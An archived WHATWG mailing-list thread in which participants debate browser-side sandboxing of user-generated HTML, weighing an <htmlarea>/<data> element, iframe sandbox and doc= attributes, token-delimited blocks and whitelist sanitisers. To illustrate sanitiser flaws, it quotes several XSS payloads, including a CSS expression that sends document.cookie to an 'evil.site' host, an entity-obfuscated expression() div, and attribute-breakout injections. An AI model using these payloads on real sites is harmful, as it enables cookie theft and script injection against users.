Re: [whatwg] Sandboxing to accommodate user generated content.

2009-02-17 Thread Ian Hickson
On Tue, 17 Jun 2008, Frode Børli wrote:
 
 A major challenge for many web developers is validating untrusted content
 such as the message body of a blog comment. Unless the developer has a
 flawless and future proof algorithm for ensuring that the message body does
 not contain any script, web developers have to resort to text only - or
 bbCode-style markup languages to allow users to post text content with
 richer formatting. [...]
 
 Another problem which makes future proofing this type of security is that
 standards evolve. A few years ago you could safely allow users to apply
 css-styles to tags. [...]

In general, using whitelisting with a real parser and serialiser 
combination, e.g. what html5lib does now, gives you a pretty secure 
and future-proof sanitiser.


 One solution:
 
 <htmlarea>User generated content</htmlarea>
 
 No scripts would ever be allowed to be executed inside this tag. 
 Malicious users could potentially submit </htmlarea> unsafe content 
 <htmlarea> and get around this. There are as I can see it two solutions 
 to this:
 
 User generated content inside the tag must be escaped using html 
 entities (but still rendered as html by the user agent), or the author 
 must prevent users from submitting the string </htmlarea> and all 
 possible variations of the tag.
 
 If the first solution is used, then browsers should display a strong 
 security warning if unescaped content is seen between <htmlarea> tags on a 
 website (to educate web developers).

HTML5 now has something similar to this:

   <iframe sandbox src="data:text/html;base64,..."></iframe>

...where ... is the sanitised user-provided content, base64-encoded.
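
As a rough illustration of the markup above, the following sketch builds such an iframe from content that has already been sanitised. It assumes Node.js (for `Buffer`); the helper name `sandboxedIframe` is made up for this example and is not part of any specification.

```javascript
// Sketch only: wrap already-sanitised markup in a sandboxed iframe using a
// base64 data: URL. `sandboxedIframe` is a hypothetical helper name.
function sandboxedIframe(sanitisedHtml) {
  // Base64 output contains only letters, digits, '+', '/' and '=', so the
  // attribute value needs no further escaping.
  const encoded = Buffer.from(sanitisedHtml, 'utf8').toString('base64');
  return '<iframe sandbox src="data:text/html;base64,' + encoded + '"></iframe>';
}

const comment = '<p>Some <b>more</b> content</p>';
console.log(sandboxedIframe(comment));
```

Because every comment is carried inside the page itself, no extra request per comment is needed.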


On Tue, 17 Jun 2008, Frode Børli wrote:
 
 In the discussions I find that backward compatibility is absolutely the 
 most important issue. Second is that it must be easy for web developers 
 to use the features.
 
 The suggested solution of using an attribute on an iframe element for 
 storing the user generated content has several problems:
 
 1: The use of src= as a fallback means that style information will be 
 lost and stylesheets must be loaded again.

The CSS can be embedded in the iframed snippets in the transition period; 
in the long term, the seamless attribute side-steps this issue.


 2: The use of src= yields problems with iframe heights (since the 
 src-url must be hosted on another server javascript cannot fix this) and 
 HTML 4 browsers have no other method of adjusting the iframe height 
 according to the content.

The seamless attribute addresses this also, though admittedly there is 
no good short-term fix for this.


 3: If you have a page that lists 60 comments on a blog, then the user 
 agent would have to contact the server 60 times to fetch each comment.

With data: URLs, all the comments can be included in the original request.


 4: For the fallback method of using src= for HTML 4 browsers to actually 
 work, the fallback documents must be hosted on a separate domain name. 
 This again means that a website using HTTPS must purchase and maintain 
 two certificates.

This is indeed a problem with any solution that is intended to work with 
today's browsers without server-side sanitisation.


 If we add a new element <htmlarea></htmlarea>, old browsers will run 
 scripts, while new browsers will stop scripts and this is a major 
 problem.

Indeed.


 If HTML 5 browsers require everything between <htmlarea></htmlarea> to 
 be html entity escaped, that is < and > must be replaced with &lt; and 
 &gt; respectively. If this is not done, HTML 5 browsers will issue a 
 severe warning and refuse to display the page. Developers will quickly 
 learn.

How would the browser know when the </htmlarea> tag is the actual end tag 
or just something that the author forgot to escape?


 HTML 4 browsers will never run scripts (since it will only see plain 
 text). HTML 5 browsers will display rich text. It would be completely 
 secure for both HTML 4 and HTML 5 browsers.

 A simple Javascript could clean up the HTML markup for HTML 4 browsers..

Wouldn't that reintroduce the security bugs?


On Wed, 18 Jun 2008, Frode Børli wrote:
 
 I have written a sanitizer for html and it is very difficult - 
 especially since browsers have undocumented bugs in their parsing.
 
 Example: <div colspan=&amp;
 style=font-family&#61;expression&#40;alert&#40&quot;hacked&quot&#41&#41
 colspan=&amp;>Red</div>

A sanitiser that did what I describe above would not be affected by this 
(or any other similar problem). Basically, you would have to parse the 
content using the HTML5 parser rules, and then reserialise the content, 
dropping any element or attribute or attribute value that is not 
explicitly whitelisted. It is critical that for every allowed attribute, 
the value be parsed using the relevant rules (e.g. CSS for style=, as a 
URL for href=, etc), and then the values therein reserialised in the 
same manner for that language (e.g. only serialising CSS properties that 
have whitelisted property values).
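
A minimal sketch of the reserialisation step follows. It assumes the content has already been parsed (by a real HTML5 parser, not shown here) into a simple tree of `{ tag, attrs, children }` objects and text strings; that tree shape, the whitelists and the function names are all assumptions made for illustration. Only `href` is handled, by parsing it as a URL and reserialising it; other attribute types would need their own parsers in the same way.

```javascript
// Illustrative whitelists; every site has to choose its own.
const ALLOWED_ELEMENTS = new Set(['p', 'b', 'i', 'a']);

// Per-element attribute validators: each parses the value with the rules
// for its language and returns a reserialised value, or null to drop it.
const ALLOWED_ATTRIBUTES = new Map([
  ['a', new Map([
    ['href', (value) => {
      try {
        const url = new URL(value); // parse as a URL
        const ok = url.protocol === 'http:' || url.protocol === 'https:';
        return ok ? url.href : null; // reserialise, or drop
      } catch (e) {
        return null; // not a parseable absolute URL
      }
    }],
  ])],
]);

function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' };
  return text.replace(/[&<>"]/g, (c) => map[c]);
}

// node is either a string (text) or { tag, attrs, children }.
function serialise(node) {
  if (typeof node === 'string') return escapeHtml(node);
  // Elements that are not whitelisted are dropped together with their content.
  if (!ALLOWED_ELEMENTS.has(node.tag)) return '';
  const validators = ALLOWED_ATTRIBUTES.get(node.tag) || new Map();
  let attrs = '';
  for (const [name, value] of Object.entries(node.attrs || {})) {
    const validate = validators.get(name);
    if (!validate) continue; // attribute not whitelisted
    const clean = validate(value);
    if (clean !== null) attrs += ' ' + name + '="' + escapeHtml(clean) + '"';
  }
  const children = (node.children || []).map(serialise).join('');
  return '<' + node.tag + attrs + '>' + children + '</' + node.tag + '>';
}

const tree = {
  tag: 'p', attrs: { onclick: 'evil()' }, children: [
    'Hi ',
    { tag: 'a', attrs: { href: 'javascript:alert(1)' }, children: ['x'] },
    { tag: 'script', children: ['alert(1)'] },
  ],
};
console.log(serialise(tree));
```

Since the output is generated only from whitelisted names and reserialised values, malformed input cannot pass through verbatim.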

Yes, 

Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-18 Thread Mikko Rantalainen
Frode Børli wrote:
 I have been reading up on past discussions on sandboxing content, and

 My main arguments for having this feature (in one form or another) in
 the browser is:

 - It is future proof. Changes to browsers (for example adding
 expression support to css) will never again require old sanitizers to
 be updated.

Unless some braindead vendor adds a scripting-in-sandboxing feature,
which would be just as braindead as unlimited expression support
in css. You cannot be future proof unless you trust all the players
including ALL possible browser vendors.

 If the sanitiser uses a whitelist based approach that forbids everything by
 default, and then only allows known elements and attributes; and in the case
 of the style attribute, known properties and values that are safe, then that
 would also be the case.
 
 I have written a sanitizer for html and it is very difficult -
 especially since browsers have undocumented bugs in their parsing.
 
 Example: <div colspan=&amp;
 style=font-family&#61;expression&#40;alert&#40&quot;hacked&quot&#41&#41
 colspan=&amp;>Red</div>

Every real sanitizer MUST parse the input and generate its internal DOM.
If you then generate a known good serialization of that DOM there's no way
your sanitizer would ever output such code. I, too, have written my own
simplified HTML parser that converts all unknown parts to data (that is,
escapes all the following characters: <>&"'). Just parse the input into
a DOM and only after that check it for safe content.

You cannot sanitize HTML using only string replacements without
generating a DOM (all of DOM is not needed in the memory at once, it's
possible to process the input as a stream and handle one tag at a time
and only keep a stack of open tag names in addition).
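
The streaming variant might look roughly like the sketch below. It is a deliberately simplified assumption of how such a sanitizer could work: it recognises only bare tags without attributes, the whitelist is illustrative, and the function names are invented for this example. Anything it does not recognise is escaped and emitted as data.

```javascript
// Illustrative whitelist; a real site chooses its own.
const ALLOWED_TAGS = new Set(['b', 'i', 'em', 'strong', 'p']);

function escapeText(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Handles one tag at a time and keeps only a stack of open tag names.
function sanitizeStream(input) {
  const out = [];
  const stack = [];
  // Only bare tags such as <b> or </b> are recognised as markup; tags with
  // attributes do not match and therefore end up escaped as text.
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)>/g;
  let last = 0;
  let m;
  while ((m = tagRe.exec(input)) !== null) {
    out.push(escapeText(input.slice(last, m.index))); // text before the tag
    last = tagRe.lastIndex;
    const closing = m[1] === '/';
    const name = m[2].toLowerCase();
    if (!ALLOWED_TAGS.has(name)) {
      out.push(escapeText(m[0])); // unknown tag becomes data
    } else if (!closing) {
      stack.push(name);
      out.push('<' + name + '>');
    } else if (stack.length > 0 && stack[stack.length - 1] === name) {
      stack.pop();
      out.push('</' + name + '>');
    } else {
      out.push(escapeText(m[0])); // end tag that matches nothing open
    }
  }
  out.push(escapeText(input.slice(last)));
  // Close whatever is still open so the output is always balanced.
  while (stack.length > 0) out.push('</' + stack.pop() + '>');
  return out.join('');
}

console.log(sanitizeStream('Some <b>more</b> <script>x</script> <i>here'));
```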

 The proof that sanitizing HTML is difficult is the fact that no major
 site even attempts it. Even Wikipedia uses some obscure wiki-language,
 instead of implementing a wysiwyg editor.

Wikipedia does sanitize HTML in the content. It does support its own
wiki-language in addition to HTML. For example, try to input the
following text as is in the Wikipedia sandbox page and press Show preview:

***

 Example: <div colspan=&amp;
 style=font-family&#61;expression&#40;alert&#40&quot;hacked&quot&#41&#41
 colspan=&amp;>Red</div>

Some <b>more</b> content <i>here</i>.
***

Works just fine. The content is sanitized and unrecognized parts are
converted to data. Correctly written parts are used as HTML tags.

Trust me, it's really not that hard. The hard part is to decide which
tags and which attributes and which attribute values do you want to
allow. And you have to decide that by yourself - there's no magic silver
bullet safe feature set that is suitable for every usage and for every site.

If you don't want to go through all this trouble, do not try to allow
HTML or any other markup in user generated content unless you *really*
trust your users.

 Note that sandboxing doesn't entirely remove the need for sanitising user
 generated content on the server, it's just an extra line of defence in case
 something slips through.
 
 Of course. However, the sandbox feature in the browser will be fail safe if
 user generated content is escaped with &lt; and &gt; before being sent
 to the browser - as long as the browser does not have bugs of course.

That's a pretty big if. If the page author / server application
programmer is always able to escape content correctly, how much harder
is it to correctly escape and sanitize the content anyway?

All this sounds too much like magic_quotes in PHP...

 A problem with this approach is that developers might forget to escape
 tags, therefore I think browsers should display a security warning
 message if the character < or > is encountered inside a <data> tag.
 If a developer forgot to escape the markup at all, then a user could enter
 </data><script>...</script> and do anything they wanted.
 
 Yes, that is my point. That is why I want the sandbox to display a
 severe security warning if the developer has forgotten to escape it.

Isn't that a bit too late? If the developer is not testing his
application before the release what's the point of breaking the whole
site in the user's browser as a result? It will not guard against XSS
because the user generated content can be *first* used to end the
sandbox and *then* used to insert an XSS attack. The browser sees only valid
content in the sandbox and the site is still under XSS attack.
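
To make the breakout concrete, here is a small sketch that models the proposed warning in a very simplified way: it takes whatever lies between the first <data> start tag and the first </data> end tag as the sandboxed content and warns if that content contains an unescaped angle bracket. The function names and this model of browser behaviour are assumptions for illustration only.

```javascript
// Hypothetical model of the proposed check, not real browser behaviour.
function sandboxContents(page) {
  const match = /<data>([\s\S]*?)<\/data>/.exec(page);
  return match ? match[1] : null;
}

function wouldWarn(page) {
  const contents = sandboxContents(page);
  return contents !== null && /[<>]/.test(contents);
}

// The developer forgot to escape, and the attacker closes the sandbox first.
const userInput = 'hello</data><script>steal()</script><data>';
const page = '<data>' + userInput + '</data>';

console.log(sandboxContents(page)); // the only part the check looks at
console.log(wouldWarn(page));       // whether a warning would be raised
console.log(page.includes('<script>')); // the script is still in the page
```

In this model the sandbox appears to contain only harmless text, so no warning fires even though the script sits outside it.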

 This method will be safe for all browsers that have ever existed and
 that will ever exist in the future. If new features are introduced in
 some future version of CSS or HTML - the sandbox is still there and
 the applications created today do not need to have their sanitizers
 updated, ever.

That's a pretty bold claim! I guess that a similar claim could have been
said about CSS support before Microsoft added the expression() value
syntax.

Can *you* guarantee that a random browser vendor does not implement
anything stupid for the sandbox content in the future?

-- 
Mikko




Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-18 Thread Kristof Zelechovski
Let’s sort things out, folks.  There is nothing in the spec to prevent a
browser vendor from formatting the user’s hard drive and draining her bank
account as a bonus when the page displayed contains the string D357R0Y!N0\V!.  The
spec does not tell the vendors what not to do, therefore it cannot guarantee
anything in this respect.  The spec provides a reference implementation and
it is our job not to let harmful extensions in here; what happens in the
wild is beyond our control.
IMHO,
Chris





Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Anne van Kesteren

On Tue, 17 Jun 2008 06:09:55 +0200, Frode Børli [EMAIL PROTECTED] wrote:
Hi! I am a new member of this mailing list, and I wish to contribute
with a couple of specific requirements that I believe should be
discussed and perhaps implemented in the final specification. I am
unsure if this is the correct place to post my ideas (or if my ideas
are even new), but if it is not, then I am sure somebody will instruct
me. :) One person told me that the specification was finished and no
new features would be added from now on - but hopefully that is not
true.


That is actually true. However, sandboxing has been proposed in the past  
and is therefore still considered in scope. (Unless of course we decide  
it's out of scope, but given the sandboxing features already in the  
specification, I expect that to be not the case.)




One solution:

<htmlarea>User generated content</htmlarea>


As you note this solution has significant issues. Besides inserting  
</htmlarea> it would also allow execution of scripts in legacy user agents  
and is therefore not really backwards compatible.


I believe the idea to deal with this is to add another attribute to  
<iframe>, besides sandbox= and seamless= we already have for  
sandboxing. This attribute, doc=, would take a string of markup where  
you would only need to escape the quotation character used (so either ' or  
"). The fallback for legacy user agents would be the src= attribute.
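
A sketch of what generating such markup could look like is given below. The doc= attribute is only the proposal discussed in this thread, and `iframeWithDoc` is a made-up helper name. The sketch assumes double quotes delimit the attribute; escaping & as well is an extra assumption on my part, so that entities already present in the markup survive attribute parsing.

```javascript
// Sketch only: `doc` is the attribute proposed in the thread, and
// `iframeWithDoc` is a hypothetical helper.
function iframeWithDoc(markup, fallbackSrc) {
  // Escape & first (assumption, see above), then the quote character that
  // delimits the attribute value.
  const escaped = markup.replace(/&/g, '&amp;').replace(/"/g, '&quot;');
  // fallbackSrc is assumed to be a trusted URL chosen by the site itself.
  return '<iframe sandbox seamless doc="' + escaped +
         '" src="' + fallbackSrc + '"></iframe>';
}

console.log(iframeWithDoc('<p title="x">a &amp; b</p>', 'http://comments.example/1'));
```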



--
Anne van Kesteren
http://annevankesteren.nl/
http://www.opera.com/


Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Frode Børli
I have been reading up on past discussions on sandboxing content, and
I feel that it is generally agreed on that there should be some
mechanism for marking content as user generated. The discussion
mainly appears to be focused on implementation. Please read my
implementation notes at the end of this message on how we can include
this function safely for both HTML 4 and HTML 5 browsers, and still
allow HTML 4 browsers to function properly.


My main arguments for having this feature (in one form or another) in
the browser are:

- It is future proof. Changes to browsers (for example adding
expression support to css) will never again require old sanitizers to
be updated.
- It does not require much skill and effort from the web developer to
safely sanitize user content.
- Security bugs are fixed by browser vendors, and not by each web developer.


In the discussions I find that backward compatibility is absolutely
the most important issue. Second is that it must be easy for web
developers to use the features.

The suggested solution of using an attribute on an iframe element
for storing the user generated content has several problems:

1: The use of src= as a fallback means that style information will be
lost and stylesheets must be loaded again.

2: The use of src= yields problems with iframe heights (since the
src-url must be hosted on another server javascript cannot fix this)
and HTML 4 browsers have no other method of adjusting the iframe
height according to the content.

3: If you have a page that lists 60 comments on a blog, then the user
agent would have to contact the server 60 times to fetch each comment.
This again means that perl/php scripts have to be invoked 60 times for
one page view - that is 61 separate database connections and session
initializations.

4: For the fallback method of using src= for HTML 4 browsers to
actually work, the fallback documents must be hosted on a separate
domain name. This again means that a website using HTTPS must purchase
and maintain two certificates.

I do not believe this solution will ever be used.


My solution:

If we add a new element <htmlarea></htmlarea>, old browsers will run
scripts, while new browsers will stop scripts and this is a major
problem.

If HTML 5 browsers require everything between <htmlarea></htmlarea> to
be html entity escaped, that is < and > must be replaced with &lt; and
&gt; respectively. If this is not done, HTML 5 browsers will issue a
severe warning and refuse to display the page. Developers will quickly
learn.

HTML 4 browsers will never run scripts (since it will only see plain
text). HTML 5 browsers will display rich text. It would be completely
secure for both HTML 4 and HTML 5 browsers.

A simple Javascript could clean up the HTML markup for HTML 4 browsers.
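
The server-side escaping step this proposal relies on could be sketched as follows. The <htmlarea> element is only the proposal from this message, `escapeForHtmlArea` is a made-up name, and escaping & in addition to < and > is an assumption added so that the text round-trips unambiguously.

```javascript
// Sketch only: entity-escape user content before placing it inside the
// proposed <htmlarea> element. `escapeForHtmlArea` is a hypothetical name.
function escapeForHtmlArea(userContent) {
  return userContent
    .replace(/&/g, '&amp;') // assumption: escape & as well as < and >
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

const userContent = 'Hi <b>there</b></htmlarea><script>x()</script>';
const page = '<htmlarea>' + escapeForHtmlArea(userContent) + '</htmlarea>';
console.log(page);
```

After escaping, the user's text contains no literal angle brackets, so a legacy browser sees the markup as plain text.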


  I believe the idea to deal with this is to add another attribute to 
 <iframe>, besides sandbox= and seamless= we already have for sandboxing. 
 This attribute, doc=, would take a string of markup where you would only 
 need to escape the quotation character used (so either ' or "). The fallback 
 for legacy user agents would be the src= attribute.

-- 
Best regards / Med vennlig hilsen
Frode Børli
Seria.no



Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Kristof Zelechovski
1.  Please elaborate how an extension of CSS would require a sanitizer
update.
2.  Please explain why using a dedicated tag with double parsing is easier
for a Web developer than putting the code in an attribute.
3.  Your quoting solution would not cause legacy browsers to show plain
text; they would show HTML code, which is probably much worse than showing
plain text.  If you mean JavaScript can be used to extract plain text, I
doubt it will be simple; there are probably lots of junctions where this
procedure can derail.
4.  Please explain why you consider network efficiency for legacy user
agents essential.  I believe that the correlation between efficiency and
compatibility is negative in general.  If that causes server overload, the
server can discriminate content depending on the user agent; this is a
temporary solution to an edge case and it should probably be acceptable.
Besides, a blog page with 60 comments on it is rather hard to render and
read so you should probably consider other display options in this case.
5.  I am not sure why IFRAME content must be HTTP-secured if the containing
page is.  The specification does not impose such a restriction AFAIK.  And,
if you need to go secure, do not allow scribbling in the first place, right?
Please take these points as a challenge, not as an attempt to let you down.
I personally think your idea is worth considering.
Chris


Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Bob Auger
Hello,

I'm new to the list and have joined in response to this discussion on
html security changes.

I have been reading up on past discussions on sandboxing content, and I feel 
that it is generally agreed on that there should be some mechanism for 
marking content as user generated. The discussion mainly appears to be 
focused on implementation. Please read my implementation notes at the end 
of this message on how we can include this function safely for both HTML 4 
and HTML 5 browsers, and still allow HTML 4 browsers to function properly.


 In the discussions I find that backward compatibility is absolutely the most 
 important issue. Second is that it must be easy for web developers to use 
 the features.

 The suggested solution of using an attribute on an iframe element for 
 storing the user generated content has several problems:

 1: The use of src= as a fallback means that style information will be lost 
 and stylesheets must be loaded again.

 2: The use of src= yields problems with iframe heights (since the src-url 
 must be hosted on another server javascript cannot fix this) and HTML 4 
 browsers have no other method of
 adjusting the iframe height according to the content.

 My solution:

 If we add a new element <htmlarea></htmlarea>, old browsers will run 
 scripts, while new browsers will stop scripts and this is a major problem.

 If HTML 5 browsers require everything between <htmlarea></htmlarea> to be 
 html entity escaped, that is < and > must be replaced with &lt; and &gt; 
 respectively. If this is not done, HTML 5 browsers will issue a severe 
 warning and refuse to display the page. Developers will quickly learn.

 HTML 4 browsers will never run scripts (since it will only see plain text). 
 HTML 5 browsers will display rich text. It would be completely secure for 
 both HTML 4 and HTML 5
 browsers.

 A simple Javascript could clean up the HTML markup for HTML 4 browsers..

I've also been having side discussions with a few people regarding the
ability for a website owner to mark sections as data rather than code
(where everything lies now).
Your <htmlarea> tag idea is a good one (maybe change the tag to <data>,
just a nitpick); however, you don't address the use case of the
following:

<data>

user supplied input

</data>

If the user injects </data> then game over.  A solution I discovered
for this problem (others I'm sure as well that aren't speaking)
borrows from the defenses of cross-site request forgery (CSRF) where a
non guessable token is used. Take the following example:

<data id=GUID>
</data>
</data id=GUID>

GUID would be a temporary GUID value such as
'F9968C5E-CEB2-4faa-B6BF-329BF39FA1E4' that would be tied to the user
session. An attacker would be unable to break out of a <data> tag due
to the fact that they couldn't guess the closing ID value. This is
something that could be built into a web framework (JSP tag/PHP
function/asp.net component) that could handle the token generation
portion to assist with adoption.
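
The token idea can be sketched as below, assuming Node.js for the random token. The end tag carrying an id is the syntax proposed in this message and is not valid HTML today; `wrapUntrusted` and `extractUntrusted` are made-up names, and `extractUntrusted` is only a toy model of how a supporting browser might locate the end of the block.

```javascript
const crypto = require('crypto');

// Wrap untrusted content in the proposed token-delimited <data> block.
function wrapUntrusted(content, token) {
  // Refuse content that happens to contain the token itself.
  if (content.includes(token)) throw new Error('content contains the token');
  return '<data id="' + token + '">' + content + '</data id="' + token + '">';
}

// Toy model: only an end tag carrying the same id closes the block.
function extractUntrusted(page, token) {
  const open = '<data id="' + token + '">';
  const close = '</data id="' + token + '">';
  const start = page.indexOf(open);
  if (start === -1) return null;
  const end = page.indexOf(close, start + open.length);
  if (end === -1) return null;
  return page.slice(start + open.length, end);
}

// An unguessable value; in the proposal it would be tied to the user session.
const token = crypto.randomBytes(16).toString('hex');
const injected = 'hi</data><script>steal()</script>';
const page = wrapUntrusted(injected, token);

// The injected </data> carries no token, so it does not end the block.
console.log(extractUntrusted(page, token) === injected);
```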

A few notes on this approach

- <data> (or <htmlarea>, whatever you call it) can not be nested.
- All content inside <data> tags would need to be treated as text or
handled as HTML entity encoded values before processing


  I believe the idea to deal with this is to add another attribute to 
 <iframe>, besides sandbox= and seamless= we already have for sandboxing. 
 This attribute, doc=, would take a string of markup where you would only 
 need to escape the quotation character used (so either ' or "). The 
 fallback for legacy user agents would be the src= attribute.


To take this a step further there may be situations where user content
is reflected inside of HTML tags in the following manner such as
'<a href="user generated value">foo</a>'. For situations like this an
additional attribute (along the lines of what you propose) could be
added to this tag (or any tag for that matter)
to instruct the browser that no script/html can execute.

<a sandbox="true" href="javascript:alert(document.cookie)">asd</a>
<a sandbox="true" href="injected value">asd</a>  (injected value "
onload="javascript:alert('wooot')" foo="bar)

In this example the developer would allow user content to be inserted
into the href value as desired, however disallow script injection as
well as breaking out of the html attribute by the specification of
this tag (i.e. everything inside each attribute is treated as HTML
entity data/text).
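
For comparison, the server-side counterpart of this idea, which works in today's browsers, is to escape the value before it is placed in the attribute. The sketch below uses made-up helper names and only prevents breaking out of the attribute; it does not address javascript: URLs, which would need a separate scheme check.

```javascript
// Sketch only: escape a value so it cannot terminate a double-quoted attribute.
function escapeAttribute(value) {
  return value
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// `text` is assumed to be trusted or already escaped.
function link(href, text) {
  return '<a href="' + escapeAttribute(href) + '">' + text + '</a>';
}

// The injected value from the example above.
const injectedValue = '" onload="javascript:alert(\'wooot\')" foo="bar';
console.log(link(injectedValue, 'asd'));
```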

My 0.04.

Regards,
- Robert Auger
http://www.webappsec.org/


Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Frode Børli
 I've also been having side discussions with a few people regarding the
 ability for a website owner to mark sections as data rather than code
 (where everything lies now).
 Your <htmlarea> tag idea is a good one (maybe change the tag to <data>,
 just a nitpick); however, you don't address the use case of the
 following:

 <data>

 user supplied input

 </data>


I have considered your idea (below) but found that it would not allow
efficient server side caching, which often is needed. If instead all
html inside <data></data> must be escaped like this:

<data>

&lt;user supplied input&gt;

</data>

Then this will be secure both for HTML 4 and HTML 5 browsers. HTML 4
browsers will display html, while HTML 5 browsers will display
correctly formatted code. A simple javascript like this (untested)
would make the <data> tags readable for HTML 4 browsers:

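var els = document.getElementsByTagName("DATA");
// Index loop: for..in over the collection would also visit "length" etc.
for (var i = 0; i < els.length; i++)
  // innerHTML still holds the escaped form, so strip &lt;...&gt; runs
  els[i].innerHTML = els[i].innerHTML
    .replace(/&lt;[\s\S]*?&gt;/g, "").replace(/\n/g, "<br>");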


A problem with this approach is that developers might forget to escape
tags, therefore I think browsers should display a security warning
message if the character < or > is encountered inside a <data> tag.


 If the user injects </data> then game over.  A solution I discovered
 for this problem (others I'm sure as well that aren't speaking)
 borrows from the defenses of cross-site request forgery (CSRF) where a
 non guessable token is used. Take the following example:

 <data id=GUID>
 </data>
 </data id=GUID>

 GUID would be a temporary GUID value such as
 'F9968C5E-CEB2-4faa-B6BF-329BF39FA1E4' that would be tied to the user
 session. An attacker would be unable to break out of a <data> tag due
 to the fact that they couldn't guess the closing ID value. This is

*snip*


  I believe the idea to deal with this is to add another attribute to 
 <iframe>, besides sandbox= and seamless= we already have for 
 sandboxing. This attribute, doc=, would take a string of markup where 
 you would only need to escape the quotation character used (so either 
 ' or "). The fallback for legacy user agents would be the src= attribute.

 To take this a step further there may be situations where user content
 is reflected inside of HTML tags in the following manner such as
 '<a href="user generated value">foo</a>'. For situations like this an
 additional attribute (along the lines of what you propose) could be
 added to this tag (or any tag for that matter)
 to instruct the browser that no script/html can execute.

 <a sandbox="true" href="javascript:alert(document.cookie)">asd</a>
 <a sandbox="true" href="injected value">asd</a>  (injected value "
 onload="javascript:alert('wooot')" foo="bar)


I like this better than a separate tag, yes: <div sandbox="1"></div> or
<div content="untrusted"></div>


Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Frode Børli
 1.  Please elaborate how an extension of CSS would require a sanitizer
 update.

In the year 1998: A sanitizer algorithm works perfectly for all
existing methods of adding scripts. It uses a white list, which allows
only certain tags and attributes. Among the allowed attributes are
colspan, rowspan and style - since the web developer wants users to be
able to build tables and style them properly.

In the year 1999 Internet Explorer 5.0 is introduced, and it
introduces a new invention: CSS expressions. Suddenly the formerly
secure web application is no longer secure. A user adds the following
code, and it passes the sanitizer easily:

<span style='color: blue; width: expression(document.write("<img
src=http://evil.site/"+document.cookie));'></span>

I am absolutely certain that there will be other, brilliant inventions
in the future which will break sanitizers - of course we can't know
today which inventions - but the sandboxing means that browser vendors
in the future can prevent the above scenario.
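
For comparison, the value-level whitelisting suggested elsewhere in this thread would treat the style value itself as something to parse and filter, rather than allowing the attribute wholesale. The sketch below is a simplification under stated assumptions: splitting on ';' is not a real CSS parser, and the property list, patterns and function name are illustrative only.

```javascript
// Illustrative whitelist of properties and the values accepted for each.
const SAFE_STYLE = new Map([
  ['color', /^(?:red|green|blue|black|#[0-9a-f]{3}|#[0-9a-f]{6})$/i],
  ['font-weight', /^(?:normal|bold)$/i],
  ['text-align', /^(?:left|right|center)$/i],
]);

// Keep only declarations whose property AND value are whitelisted, and
// reserialise them; everything else is dropped.
function filterStyle(styleValue) {
  const kept = [];
  for (const declaration of styleValue.split(';')) {
    const colon = declaration.indexOf(':');
    if (colon === -1) continue;
    const property = declaration.slice(0, colon).trim().toLowerCase();
    const value = declaration.slice(colon + 1).trim();
    const pattern = SAFE_STYLE.get(property);
    if (pattern && pattern.test(value)) kept.push(property + ': ' + value);
  }
  return kept.join('; ');
}

const attack = 'color: blue; width: expression(document.write(' +
  '"<img src=http://evil.site/"+document.cookie));';
console.log(filterStyle(attack));
```

Under this scheme a value syntax introduced after the sanitizer was written is dropped by default, because it matches no whitelisted pattern.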

 2.  Please explain why using a dedicated tag with double parsing is easier
 for a Web developer than putting the code in an attribute.

1. The code will still work in Dreamweaver and similar tools.
2. It is not a totally new way of doing things (we already escape
content that is put into a <textarea> in exactly the same way as I
suggest we put content into the sandbox). Putting a 100 KB piece of
user-submitted content into an attribute will feel weird - and perhaps
even break current parsers.
3. Web developers do not have to create separate scripts to cater for
HTML 4 browsers (so that the <iframe src=""> fallback will work).
4. Web developers do not have to create two separate websites (on
different domains) that use the same database to make sure that cross
site scripting can't happen from the iframe to the parent document. If
the web developer simply places a separate script on the same host,
then the fallback will have no security at all.
5. The fallback requires the web developer to know the visible size of
the content in advance. HTML 4 browsers do not support any method of
resizing the iframe according to the content when the content of
the iframe is from a different domain.
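
The escaping mentioned in item 2 is the same entity escaping that is already
applied to text placed inside a textarea. A minimal sketch in JavaScript is
given here for illustration; the helper name escapeHtml and the sample input
are assumptions and not part of the proposal:

```javascript
// Hypothetical helper: entity-escape untrusted text before embedding it in markup.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")   // must run first so the "&" added below is not escaped again
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// An attempt to close the container early is neutralised by the escaping.
const userInput = "</textarea><script>alert(1)</script>";
console.log("<textarea>" + escapeHtml(userInput) + "</textarea>");
```

With this escaping in place, the closing tag inside the user input reaches the
browser as text rather than as markup.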


 3.  Your quoting solution would not cause legacy browsers to show plain
 text; they would show HTML code, which is probably much worse than showing
 plain text.  If you mean JavaScript can be used to extract plain text, I
 doubt it will be simple; there are probably lots of junctions where this
 procedure can derail.

I am pretty sure that including a small script similar to this into
the main document will make the content very readable, although plain
text:

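<script>
// Strip tag-like substrings from each <data> element and turn newlines into <br>.
var els = document.getElementsByTagName("DATA");
for (var i = 0; i < els.length; i++) {
  els[i].innerHTML =
    els[i].innerHTML.replace(/<[^>]*>/g, "").replace(/\n/g, "<br>");
}
</script>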

I can guarantee you that with a few hours' work I would have a very good
script that does this very well.

 4.  Please explain why you consider network efficiency for legacy user
 agents essential.  I believe that the correlation between efficiency and
 compatibility is negative in general.

It is not the network efficiency for the user agents I am worried about
- it is the server side of things that will be the problem. If the
server has to handle 20 separate dynamic requests just to display a
single page view, then that is unacceptable - and the method will never
be used by bigger websites simply because it is not scalable. In fact,
it would already have been done if it were a viable option. Please
consider my answer to your question number two as well.

 If that causes server overload, the
 server can discriminate content depending on the user agent; this is a
